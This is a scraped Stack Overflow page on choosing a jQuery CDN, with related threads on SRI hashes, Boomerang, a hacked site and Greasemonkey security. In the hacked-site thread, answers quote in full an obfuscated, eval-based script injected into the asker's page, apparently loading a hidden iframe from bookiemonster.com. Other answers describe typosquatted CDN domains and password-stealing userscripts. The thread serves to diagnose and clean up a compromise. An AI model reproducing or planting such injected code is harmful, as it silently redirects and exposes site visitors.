Microsoft CDN for jQuery or Google CDN? [closed] - javascript

Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 8 years ago.
Improve this question
Does it actually matter which CDN you use to link to your jquery file or any javascript file for that matter. Is one potentially faster than the other? What other factors could play a role in which cdn you decide to use? I know that Microsoft, Yahoo, and Google all have CDN's now.

Update based on comments:
Short version: It doesn't matter much, but it may depend on what they host. They all host different things: Google doesn't host jQuery.Validate, Microsoft did not host jQuery-UI, since 2016 they do!!, Microsoft offers their scripts that would otherwise be served via ScriptResource.axd and an easier integration (e.g. ScriptManager with ASP.Net 4.0).
Important Note: If you're building an intranet application, stay away from the CDN approach. It doesn't matter who's hosting it, unless you're on a very overloaded server internally, no CDN will give you more performance than local 100mb/1GB ethernet will. If you use a CDN for a strictly internal application you're hurting performance. Set your cache expiration headers correctly and ignore CDNs exist in the intranet-only scenario.
The chances of either being blocked seems to be about equal, almost zero. I have worked on contracts where this isn't true, but it seems to be an exception. Also, since the original posting of this answer, the context surrounding it has changed greatly, the Microsoft CDN has made a lot of progress.
The project I'm currently on uses both CDNs which works best for our solution. Several factors play into this. Users with an older browser are still probably making 2 simultaneous requests per domain as recommended by the HTTP specification. This isn't an issue for anyone running anything decently new that supports pipelining (every current browser), but based on another factor we're knocking out this limitation as well, at least as far as the javascript.
Google's CDN we're using for:
jquery.min.js
jquery-ui.min.js.
Microsoft's CDN we're using for:
MicrosoftAjax.js
MicrosoftAjaxWebForms.js (until 4.0 we're not completely removing all UpdatePanels)
jQuery.Validate.min.js
Our server:
Combined.js?v=2.2.0.6190 (Major.Minor.Iteration.Changeset)
Since part of our build process is combining and minifying all custom javascript, we do this via a custom script manager that includes the release or debug (non-minified) versions of these scripts depending on the build. Since Google doesn't host the jQuery validation package, this can be a down-side. MVC is including/using this in their 2.0 release, so you could rely completely on Microsoft's CDN for all your needs, and all of it automatic via the ScriptManager.
The only other argument to be made would be DNS times, there is a cost to this in terms of page load speed. On Average: Simply because it's used more (it's been around longer) ajax.googleapis.com is likely to be returned by DNS sooner than ajax.microsoft.com, simply because the local DNS server was more likely to get a request for it (this is a first user in the area penalty). This is a very minor thing and should only be considered if performance is extremely important, down to the millisecond.
(Yes: I realize this point is contrary to my using both CDNs, but in our case the DNS time is far overshadowed by the wait time on the javascript/blocking that occurs)
Last, if you haven't looked at it, one of the best tools out there is Firebug, and some plug-ins for it: Page Speed and YSlow. If you use a CDN but your pages are requesting images every time because of no cache-headers, you're missing the low-hanging fruit. Firebug's Net panel can quickly give you a quick breakdown of your page load-time, and Page Speed/YSlow can offer some good suggestions to help.

You should absolutely use the Google CDN for jQuery (and this is coming from a Microsoft-centric developer).
It's simple statistics. Those who would consider using the MS CDN for jQuery will always be a minority. There are too many non-MS developers using jQuery who will use Google's and wouldn't consider using Microsoft's. Since one of the big wins with a public CDN is improved caching, splitting usage among multiple CDNs decreases the potential for that benefit.

Google will send you a jQuery version minified with their own software, this version is 6kb lighter than the standard minified version served by MS. Go for Google.

One minor thing to consider is that both companies offer slightly different "extra" libraries:
Microsoft is offering the JQuery validation library on their CDN, whereas Google is not (http://www.asp.net/ajaxlibrary/cdn.ashx)
Google is offering the JQuery UI library on their CDN, whereas Microsoft is not (http://code.google.com/apis/ajaxlibs/documentation/)
Depending on your needs, this may be relevant.

It should also be noted that as ajax.microsoft.com is a sub domain of microsoft.com requests send all microsoft.com cookies adding to the overall time it takes to get the file back.
Also, ajax.microsoft.com is using default IIS7 compression which is inferior to the standard compression that other web servers use.
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.4.min.js - 33.4K
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js - 26.5K
Also, as others have mentioned google CDN is way more popular which greatly increases the chance of a file being cached.
So I strongly recommend using google.

It probably doesn't matter, but you could validate this with some A/B testing. Send half of your traffic to one CDN, and half to the other, and set up some profiling to measure the response. I would think it more important to be able to switch easily in case one or the other had some serious unavailability issues.

I know I'm chiming in a little late here, but here is the code that I've been using in production. I've never had issues with it, but your mileage may vary. Make sure you test it in your own environment.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script type="text/javascript">
!window.jQuery && document.write('<script src="/scripts/jquery-1.4.2.min.js"><\/script>')
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.min.js" type="text/javascript"></script>
<script type="text/javascript">
!window.jQuery.ui && document.write('<script src="/scripts/jquery-ui-1.8.2.min.js"><\/script>')
</script>

Is one potentially faster than the other?
I was actually curious of this myself so I setup a jsbin test page using each of the following and then ran it through webpagetest.org's visual comparison tool. I tested:
ajax.googleapis.com
code.jquery.com
ajax.aspnetcdn.com
cdnjs.cloudflare.com
Who was fastest: code.jquery.com by 0.1 second in both tests
Who was slowest: ajax.aspnetcdn.com by 0.7 seconds in first test and ajax.googleapis.com by 1 second in second test
Here's the 1st test (each was tested 3 times):
Video: http://www.webpagetest.org/video/view.php?id=121019_16c5e25eff2937f63cc1714ed1eac814794e62b3
Reports: http://www.webpagetest.org/video/compare.php?tests=121019_D2_KF0,121019_9Q_KF1,121019_WW_KF2,121019_9K_KF3
Here's the 2nd test (another 3 each):
Video: http://www.webpagetest.org/video/view.php?id=121019_a7b351f706cad2c25664fee7ef349371f17c4e74
Reports: http://www.webpagetest.org/video/compare.php?tests=121019_MP_KJN,121019_S6_KJP,121019_V9_KJQ,121019_VY_KJR

As stated by Pingdom:
When someone visits your site, if they have already visited another
site that uses the same jQuery file on the same CDN, the file will
have been cached and doesn’t need to be downloaded at all. It can’t
get any faster than that.
This means that the most widely used CDN will have the odds on its
side, which can pay off for your site.
A few observations on performance:
Google’s CDN is consistently the slowest of the three both in North America and Europe. In Europe, Microsoft’s CDN is the fastest.

I think it depends on where is your targeted audience. You can use alertra.com to check both CDN speed from many locations around the world.

One additional consideration - if your site is SSL and you need to support Android 2.1 (or earlier), the SSL certificate on the HTTPS version of the Microsoft CDN will crash those versions of the Android browser, per this issue: http://code.google.com/p/android/issues/detail?id=5001. It's not Microsoft's "fault", as the SSL certificate is technically valid and the defect is in Android's SSL implementation... but it will crash your site, nonetheless.
The SSL cert on Google's CDN does not fall afoul of this particular issue (relating to the certificate's "Certificate Subject Alt Name").
So, for SSL + Android 2.1 support, use the Google CDN.

My answer is bit different than others, I will go with microsoft if you need jquery validator which almost everyone need if you are using jquery.
Microsoft CDN http connection is Keep-Alive which is big plus when you are requesting multiple items.
So if you need jquery validation then use Microsoft CDN, even if you need jquery ui use microsoft because google not not keeping keep-alive so every request are on it's own. so mixing in that way is plus. if you are using microsoft only for validator then you are doing seperate connection with google server for each request.

In the summery it says that microsoft is not offering UI, that is not correct (any more). It can be downloadloade at http://www.asp.net/ajaxlibrary/cdn.ashx.

Also consider when using Google CDN that some times people make typos such as ajax.googelapis.com. This could potentially create a really nasty xss (cross site scripting) attack. I have actually tested this out by registering a googlapis.com typo and very quickly found myself serving requests for javascript, maps, css etc.
I emailed Google and asked them to register similar CDN typo URL's but have not heard back. This could be a real reason not to rely on CDN's because there are potentially dangerous attackers awaiting the typo requests and can easily serve back jquery etc with an xss payload.
Thank you

Depending which industry the application targets, you may not want to use a CDN managed by other organisations. It often raises issues regarding to compliance, privacy and confidentiality.
For example, when you include Google Analytics in a secure application, the browser still sends the current URL as the "referer" header. Any identifiers, say a session id or secret token may appear in their logs. For example, if a client IP of 192.0.2.5references https://healthsystem.example/condition/impotence, then well, you can infer information which is considered to be rather private.
Other cases include information of consequence, such as an account number, social security number or session information in the URL. That sort of data should never be in the URL as it can be used outside of the application.
While you may trust Google, Microsoft or Yahoo, your users may not.
For industries like Finance, Legal and Health Care, you may want to establish your own CDN with the help of a vendor (e.g. Akamai) with which you can sign a BAA.

I would advise that you base your usage on the general location of the users you're targeting.
If your site is targeted for general public, then using Google's CDN would be a good choice.
If your site is also targeted at China, then using Microsoft's CDN would be a better choice.
I know from my experience, as Google's servers kept getting blocked by the Chinese government, rendering websites that uses them un-loadable.
*Note that you can of cos create region specific sites, e.g. cn.mysite.com to cater specifically for China, but if you're low on resources and time, its worth a consideration.
Full list of Microsoft CDN here.
http://www.asp.net/ajaxlibrary/cdn.ashx
They have since renamed to ajax.aspnetcdn.com, which reduces the likelihood of blockage by firewall rules.

I would use both!
As the Google Jquery hosting has been around a lot longer, the chances are much higher that people will already have it cached compared to the Microsoft one, so I would have it first.
Personally, I would use something like this -
if (typeof jQuery == 'undefined') {
// jQuery is not loaded
document.write("<scr" + "ipt type=\"text/javascript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js\"></scr" + "ipt>");
}
} else {
// jQuery is loaded
}
(Not sure this 100% works, but I was just going to write the idea and not example - This references the Google hosted Jquery and not the Microsoft one as I couldn't find the link)

Related

Possible reasons for different SRI results in different browsers?

A client would like to use SRI on all CSS and JS assets on their website, but they ran into a very strange issue with Firefox. Their server is an apache2 instance, serving HTML content. CORS is enabled for the whole virtual host, for any (*) origin. There is no cache or CDN in place.
The two files in question are
company.min.css and
company.min.js
To generate the SRI hashes, initially SRI Hash Generator was used. The output from this has multiple algorithms and looks like this:
<script src="https://example.com/static/company.min.js" integrity="sha256-aKuSpMxn15zqbFa0u0FVA7mAFOSVwIwU4gA3U7AZf5Y= sha384-WDAg+qGBjbEyE52SdQ5UHdTObTY+jYTL63m9Oy2IJcGZR8AFn0t9JNN7qdut6DBk sha512-bxmUFj1FVOVV74+zIYau/HSUcLq9cuneBKoMJyW9dAz//yKFi8eRhyyIezF++2vbGO7cR6Pzm1l9rvnPcrvIrg==" crossorigin="anonymous"></script>
similar for the CSS file. These were inserted in the HTML and the site was tested in a few different browsers, with these result:
works in Chrome (/Canary), Opera, Edge and even IE
doesn't work in Firefox (/Nightly).
Firefox only dislikes the CSS, saying that the SHA512 does not match the resource. It processes the JS file fine for whatever reason.
I confirmed (using OpenSSL) that the hash generated by the above tools is indeed correct, and the fact that it works in almost every browser except Firefox got me thinking.
So I tried to hash the resources using Mozilla's own SRI tool, srihash.org, which is a recommendation by Mozilla from their blog post on SRI.
Now it get's a bit weird.
For the CSS file, srihash.org generates a completely different hash.
For the JS file, the hash is the same for both generators and match my offline hashing with OpenSSL.
But, if I replace the CSS link with the Mozilla-generated one, this is the result:
works in Firefox
doesn't work anywhere else, since the hash mismatches
Question
I suspect this is some problem within Firefox' SRI implementation. The relevant discussion for the implementation is here, but it doesn't give any reasons why the resource is different in Firefox. But I'm not strictly a web developer, so are there any likely (documented) reasons for different SRI hashes in different browsers?
I can't disclose the exact server/resources. This is a general question, so if you have any objective experience or references to authorized sources documenting differences in the SRI implementation, please answer.

Implementing Boomerang into a browser extension/plugin

I am currently developing a browser extension/plugin that one would install and would then report information such as page load times, number of objects on each page, etc. to a server so that the data could be analyzed.
I was curious if something like Yahoo's Boomerang JavaScript code (http://hacks.bluesmoon.info/boomerang/doc/) would be able to be able to do this. From what I have read, it seems like Boomerang was developed for developers to implement into their own website in order to gather data, but would I be able to gather the same kind of data by putting this code in a browser extension in order to gather the data from each website that is visited?
The link you're using for boomerang is very outdated (it was my first experimental page). Use http://lognormal.github.com/boomerang/doc/
Boomerang does already use these APIs, and much more, but as a browser extension, you could do much more in terms of removing code that supports other browsers, and also maintaining offline storage more efficiently than boomerang's cookies.
FWIW, yslow already does most of what you want, so maybe just use that (it was built by the same team)
I don't see why not from a technical perspective, at least in Firefox and Chrome. However, user privacy issues and policies of the browser extension stores might prevent you from tracking users in certain ways and/or without consent. So better check that first to avoid surprises later.
You'd need a way to gather information. Judging from your question text, the regular DOM APIs and the PerformanceTiming API might be sufficient. And that's probably what Boomerang uses already.
You'd just attach your code (or Boomerang) with e.g. Firefox Add-on SDK PageMod or Chrome extension Content Scripts.
You'll also need to transmit the data somewhere. Both Firefox (XUL1, Add-on SDK) and Chrome extensions allow cross-origin XHR.
So there you are. ;)
1 XUL overlay scripts are privileged, and not restricted by the same-origin policy.

My site is loading some other site, causing it to redirect to it

My site, http://moremariners.com is making a request to http://bookiemonster.com/ads.php (which isnt even a real page), causing it to redirect to the page on mobile browsers. You can see that the request is made on a PC, too, and if you inspect with Google Chrome, you can see the GET request for it. However, none of my files include a get request to the host.
How do I rid myself of this garbage?
Note the very end of your index.html file:
</html><script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k...
Your site has been hacked.
Whether or not someone here will go to the effort of decoding what this JavaScript does, what HTML it loads, etc. (which I would find interesting reading), the point is that your site has either insecure configurations or code with vulnerabilities.
The safest way forward is to wipe the machine. (Really. Rootkits are pretty incredible things these days. Someone else may have better control of your machine than you do.) Then re-install your CMS using the latest released and supported version. Then re-install your data, dumped from a known good data source. (You do have off-line backups of your data, right?) Make sure your data is clean and problem-free before loading it in your new instance. Make sure you configure your access controls as tight as possible, so that future attacks are more difficult. Consider also deploying a mandatory access control tool such as AppArmor, SELinux, TOMOYO, or SMACK. (I've been an AppArmor team member for over a decade now; it's my recommendation for most users but one of the other tools may be a better fit for you or your organization.)
Sounds like a malicious program infected ur system
I've used Hitman Pro, a cloud based anti virus and malware program that will clear most infections like this - for free for 30 days too...
Search google and download it. V 3.5 I think
Jonah
Your page ends up with two frames in it, that both refer to bookiemonster for ads.
You have this suspicious looking code at the end of your page that appears to be some sort of javascript that is trying to obscure what it's doing. If this isn't something you put there on purpose, then your site or page may have been hacked. I'd suggest removing this from the end of your page and then it's probably time for a thorough site security review. You probably will need to monitor that it doesn't get put back too.
<script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script><script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script>

Is using a CDN for jQuery (or other static files/scripts) really a good idea?

It says everywhere to use a CDN, such as Google's or Microsoft's AJAX CDN to load static script libraries, such as jQuery in my case.
I don't understand how this is really helpful to make my site any faster. In firebug, I'm getting around 300ms both for Google and Microsoft AJAX servers when I load jQuery, and in Chrome, I'm getting around 100ms (dunno what creates the difference, no downloads going on, tried both several times, but anyway that's not the point), my site will have an estimated average of 30 to 40ms response time when I deploy. How can loading the files the CDN do any good to my site? It will make everything even worse!
I understand that when I visit many sites using, say, jQuery from Google's CDN, it will have to "download" the script only once for a very long time, but my browser still tries to connect to the Google's server, and ask for the script file, and then receive 304 not modified status code. During this round trip of 200ms (average of Chrome and FF), I wait. But if I hosted the script file myself, then it will (down)load MUCH faster, about five times, which is an important factor for user experience. Maybe 200ms is not a VERY BIG deal, but it's still a difference and I want to know why it's recommended to use a CDN instead of hosting files ourselves. In the end, after one-time load, the browser will cache the script for my site as well and if I use CDN, browser will ask the CDN for the script anyway which will lag my website.
Update: I am from Turkey, and that may be the primary reason to have high roundtrips. Most of my visitors will be from here, so I'm asking would it be beneficial for my site hosted on servers in Turkey, and users of my site who are also at Turkey, to use CDN. Definitely not good for roundtrips, but maybe I'm missing out something.
Two part answer:
You shouldn't be seeing 304s
But is it a good idea?
You Shouldn't Be Seeing 304s
I understand that when I visit many sites using, say, jQuery from Google's CDN, it will have to "download" the script only once for a very long time, but my browser still tries to connect to the Google's server, and ask for the script file, and then receive 304 not modified status code.
It shouldn't, not if it's respecting the Cache-Control header:
Cache-Control:public, max-age=31536000
...which says from the date on the resource, the browser can cache it for up to a year. No need for any HTTP request at all (and that's what I see in Chrome unless I force it, no request at all, just a note saying "from cache"; fired up Firefox and made sure Firebug was on for all pages, came to StackOverflow for the first time in a long time with Firefox [which I only use for testing], and sure enough, it didn't issue any request for jquery at all).
E.g., maybe it takes 200ms for a 304 response, but if your browser is caching correctly, it'll be 0ms for a load-from-cache.
The full set of relevant headers I see on a forced request are:
Cache-Control:public, max-age=31536000
Date:Wed, 17 Aug 2011 21:56:52 GMT
Expires:Thu, 16 Aug 2012 21:56:52 GMT
Last-Modified:Fri, 01 Apr 2011 21:23:55 GMT
...so my browser shouldn't have to request that path again for nearly a year.
See #Dave Ward's comment below: To get max caching results, use the full release number, e.g.:
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js'></script>
<!-- very specific ---^^^^^ -->
rather than
<script src="//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js'></script>
<!-- very generic ----^ -->
Okay, but is it a good idea?
That's entirely up to you. Even with a fallback like this:
<script src="//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js'></script>
<script>
if (typeof jQuery === "undefined") {
document.write("<scr" + "ipt src='/my/local/jquery.js'></scr" + "ipt>");
}
</script>
...or similar, the UX if the CDN is down is going to be awful. The browser is going to spin for ages trying to connect to it. That kind of fallback will only help if the CDN quickly replies with a failure, which is unlikely.
This means if Google's CDN goes down, you would have to quickly adjust what you're serving to use your local copy instead. So defending against that becomes a monitoring exercise (of Google's servers; don't overdo it or they'll be displeased) with a failover at the server level to start serving pages with a local path. (Or a Microsoft path, on the theory that Google and Microsoft probably aren't sharing underlying CDN technology, given how well they get along.)
For me, the answer for most sites is probably: Go ahead and use the CDN, react if and when Google's CDN for libraries goes down. The flip side is: If you're happy with your overall page load performance loading it from your server, little harm in doing that until or unless traffic is high enough that you're looking to eke every last bit of performance out of things. But lots (and lots and lots) of sites rely on Google's CDN, if it goes down, your site will be far from alone in failing...
Could give you 6,953 reasons why I still let Google host jQuery for me.
The main advantages being
Decreased Latency
Increased parallelism
Better caching
one important note on why Firefox doesn't cache what it should cache !
FIREBUG has an small feature called "Disable Browser Cache"
developers and designers most of the times turn it on and so firefox don't cache anything even when firebug is not active !!
so just open 'firebug' > go to 'Net' tab >
i think this is very costly bug in firebug which cause a lot of bandwidth wasting for poor developers !
The point is, that if many websites reference the CDN-based versions, chances are high that users coming to your site already have the script in their cache.

How safe is Greasemonkey?

I've never actually used greasemonkey, but I was considering using it.
Considering that GreaseMonkey allows you to let random people on the Internet change the behavior of your favorite websites, how safe can it be?
Can they steal my passwords? Look at my private data? Do things I didn't want to do?
How safe is Greasemonkey?
Thanks
Considering that GreaseMonkey allows you to let random people on the Internet change the behavior of your favorite websites, how safe can it be?
It's as safe as you allow it to be - but you aren't very clear, so let's look at it from a few perspectives:
Web Developer
Greasemonkey can't do anything to your website that a person with telnet can't already do to your website. It automates things a bit, but other than that if greasemonkey is a security hole, then your website design is flawed - not greasemonkey.
Internet user with Greasemonkey loaded
Like anything else you load on your system, greasemonkey can be used against you. Don't load scripts onto your system unless you trust the source (in both meanings of the term 'source'). It's fairly limited and sandboxed, but that doesn't mean it's safe, merely that it's harder for someone to do something nefarious.
Internet user without Greasemonkey
If you do not load greasemonkey or any of its scripts, it cannot affect you in any way. Greasemonkey does not alter the websites you visit unless you've loaded it on your system.
Greasemonkey developer
There's not much you can do beyond what can already be done with XUL and javascript, but it is possible to trash your mozilla and/or firefox profile, and possibly other parts of your system. Unlikely, difficult to do on purpose or maliciously, but it's not a bulletproof utility. Develop responsibly.
-Adam
Considering that GreaseMonkey allows you to let random people on the Internet change the behavior of your favorite websites
Random people whose UserScript you have installed. No one can force you to install a UserScript.
Can they steal my passwords?
Yes, a UserScript could modify a login page so it sent your password to an attacker.
No, it cannot look at your current passwords, or for websites the UserScript isn't enabled for
Look at my private data?
Yes, if your private data is viewable on a website that you've given a UserScript access too
Do things I didn't want to do?
Yes, a UserScript could do things to a webpage (you've given it access to) that are unwanted
How safe is GreaseMonkey?
As safe as the individual UserScripts you have installed
When used with discretion, Greasemonkey should be perfectly safe to install and use. While it is definitely possible to do all manners of mischief with carte-blanche Javascript access to pages, Greasemonkey scripts are restricted to specific URLs, and will not run on sites that are not specified by the URL patterns in their headers.
That being said, a basic rule of thumb is to consider most information on pages with Greasemonkey scripts active to be accessible to those scripts. It is technically feasible to play games like replacing input boxes (in which you might enter passwords or personal info), read any data on the pages, and send data collected to a third party. Greasemonkey scripts do run in an effective sandbox within the browser, and shouldn't be able to affect your computer outside of Firefox.
That being said, in some respects, the risk is comparable to or less than that of installing any other small pieces of open source software. Since Greasemonkey scripts are simple open source Javascript files, it's relatively easy for a programmer to take a look inside and make sure it does what it says it does. As always, run strangers' code (of any form) with care, and take the time to skim the source code if the software is important to you.
In general though, Greasemonkey scripts should be pretty safe. Try to use scripts with a large number of reviews and users, since these are likely to be more thoroughly vetted and analyzed by the community.
Happy userscripting!
Yes, userscripts can steal your passwords. That's the bottom line. Don't use firefox addons or userscripts on work or government computers without referring to your bosses.
Unlike firefox addons userscripts are not formally vetted. (Firefox 'experimental' addons are also not vetted). You can register and add a malicious script to userscripts.org in a moment.
Userscripts are very unsafe. The cross-site scripting ability means that it's no difficulty at all to send off your details/passwords to an evil server quite invisibly. And the script can do it for any site. Ignore the other answers that attempt to dismiss/minimise this issue. There are two issues: evil script writers putting their evil wares on to userscripts.org and scripts that break greasemonkeys' sandbox and so are vulnerable to being used by malicious code on a hacked site that would otherwise be restricted to same-domain.
In the case of evil script authors you can examine the scripts for code that sends your details; not much fun. At the very least you could restrict the script to particular sites by editing the 'include/exclude' clause. That doesn't solve the problem but at least it won't be sending off your banking credentials (unless you've used the same login details). It's a pity there isn't an 'includexss' clause to restrict xss requests, which would effectively solve the problem since, crucially, it would be easy to check even for non-developers. (the Firefox addon "RequestPolicy" doesn't block userscripts.)
Unsafe scripts: look for any use of 'unsafewindow'. There are other risky calls. Greasemonkey doesn't warn you of their use when the script is installed. Use of these calls doesn't mean the script is unsafe, just that the script writer had better be good at secure programming; it's difficult and most aren't. I avoid writing scripts that would need these calls. There are popular, high-download scripts that use these calls.
